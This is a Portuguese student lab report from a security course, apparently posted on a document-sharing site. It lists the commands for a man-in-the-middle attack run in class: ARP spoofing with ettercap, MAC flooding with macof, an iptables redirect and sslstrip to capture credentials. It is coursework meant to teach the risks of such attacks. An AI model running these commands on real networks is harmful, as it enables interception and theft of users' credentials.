Diretório

faculdade de tecnologia senac goiás henrique ferreira da silva
download Denúncia

Transcrição

faculdade de tecnologia senac goiás henrique ferreira da silva 
FACULDADE DE TECNOLOGIA SENAC GOIÁS
HENRIQUE FERREIRA DA SILVA
ADELTON HENRIQUE
ALINE GRAZIELLE NUNES
ABISHAI LEMES BORGES NETO
PROJETO INTEGRADOR
GOIANIA
2015/1
HENRIQUE FERREIRA DA SILVA
ADELTON HENRIQUE
ALINE GRAZIELLE NUNES
ABISHAI LEMES BORGES NETO
MITM
Trabalho de Tecnologia de Redes
Apresentado
a
Faculdade
de
Tecnologia Senac Goiás. Curso de
graduação tecnologia em Segurança
da Informação.
Orientador: Prof. Marissol Martins
GOIÂNIA
2015/1
Sistema Operacional utilizado para intermediar o ataque: Kali Linux 1.1.0a.
Ferramentas utilizadas: Nativas do O.S (Nmap, Ettercap, Arpspoof, Macof,
sslstrip, urlsnarf).
Abaixo passo a passo do experimento realizado em servidores próprios
configurados em sala de aula
Acessando o terminal:
#ifconfig (verificando interfaces de rede )
#route (verifica a tabela de rotas e gateway)
#nmap –sP rede (Faz um scanner na rede para descobrir host ativos )
#echo 1 > /proc/sys/net/ipv4/ip_forward ( Habilita o encaminhamento de
pacotes pelo Kernel)
#iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –
to-port 10000 (Direciona o trafego que chega na porta 80 para a porta 10000)
#macof (Inunda a tabela mac do switch)
Abaixo printscreen da tabela mac do switch antes e depois do ataque ser
iniciado.
Antes:
Depois:
#ettercap –T –q –i eth0 –M ARP:REMOTE /ip da vitima/ /ip do roteador/
(ettercap: faz a capitura do trafego. No caso abaixo foi usado para a rede toda)
Explicando as funções
-T – Usar em modo texto somente
-q – Usar modo silencioso
-i – Definição de interface.
SSLStrip - é uma ferramenta que pode passar as ligações SSL a ligações
normais sem SSL, permitindo assim que os dados que deveriam estar
encriptados passarem sem qualquer tipo de proteção.
#sslstrip –l 10000 (Mesma porta apontada no iptables)
Urlsnarf gera log de acesso a sites
#urlsnarf –i eth0
Abaixo imagem de log gerado pelo urlsnarf
Abaixo printscreen de credencias capituradas com sslstrip e urlsnarf
Atenção: Roubo de Informações é CRIME, sujeito as penalidades da
Lei: 12.737, o mal uso do conteúdo deste artigo é de sua total responsabilidade
pois o mesmo tem como objetivo destacar os riscos que estamos expostos a
realizar um simples acesso a conta do Facebook em uma LanHouse por
exemplo.

Documentos relacionados

Relatório Man-In-The

Relatório Man-In-The Para realizar o ataque será necessário o estudo da ferramenta e técnicas já desenvolvidas para o ataque de transbordamento da tabela CAM do switch e para ataque de Man-In-The-Middle

Leia mais

Alunos Novos - Colégio São José

Alunos Novos - Colégio São José

Leia mais

Henrique Neto (texto)

Henrique Neto (texto)

Leia mais

Classificação Geral Rally Rota Radical

Classificação Geral Rally Rota Radical

Leia mais

O que Catarina de Aragão, Ana Bolena, Jane Seymour, Anna de

O que Catarina de Aragão, Ana Bolena, Jane Seymour, Anna de

Leia mais

faculdade de tecnologia senac goiás henrique ferreira da silva

faculdade de tecnologia senac goiás henrique ferreira da silva FACULDADE DE TECNOLOGIA SENAC GOIÁS

Leia mais

Com seus sets refinados e ao mesmo tempo eletrizantes, Dj

Com seus sets refinados e ao mesmo tempo eletrizantes, Dj

Leia mais

Resultado Final Assistencia Estudantil 2014

Resultado Final Assistencia Estudantil 2014

Leia mais

eliseu mocitaíba da costa

eliseu mocitaíba da costa

Leia mais

1º Ano – Ensino Fundamental

1º Ano – Ensino Fundamental

Leia mais

Ana Helena Guerreiro Sonoda

Ana Helena Guerreiro Sonoda

Leia mais

Rotas no Linux Quando configuramos o Gateway de uma interface

Rotas no Linux Quando configuramos o Gateway de uma interface

Leia mais

Segurança de Redes - BolinhaBolinha.com

Segurança de Redes - BolinhaBolinha.com

Leia mais

Assessoria ao cliente

Assessoria ao cliente

Leia mais
2024 © doczz.com.br
Sobre nós | DMCA / GDPR | Abuso